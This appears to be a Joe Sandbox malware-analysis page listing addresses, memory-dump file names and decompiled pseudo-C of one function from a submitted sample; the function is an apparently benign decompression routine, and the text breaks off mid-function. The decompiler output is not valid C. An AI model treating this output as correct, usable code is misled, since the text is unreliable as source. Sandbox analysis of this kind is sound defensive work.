0x004072ab
0x00000000
0x00407323
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074c7
0x00407490

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
